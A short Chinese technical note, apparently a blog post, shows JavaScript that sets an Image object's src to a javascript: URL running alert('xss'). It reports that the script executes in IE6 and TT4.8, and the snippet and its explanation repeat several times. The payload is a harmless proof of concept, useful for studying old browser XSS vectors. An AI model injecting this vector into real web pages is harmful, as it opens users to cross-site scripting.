- var img = new Image();
- img.src = "javascript:alert('xss');";
var img = new Image();
img.src = "javascript:alert('xss');";
经测试在部分浏览器会执行里面的脚本,IE6和TT4.8版本。
本文揭示了通过创建Image对象并设置其src属性为JavaScript代码,在特定浏览器中触发XSS攻击的可能性。测试结果显示,IE6和TT4.8版本受此攻击影响。
var img = new Image();
img.src = "javascript:alert('xss');";
经测试在部分浏览器会执行里面的脚本,IE6和TT4.8版本。
2万+

被折叠的 条评论
为什么被折叠?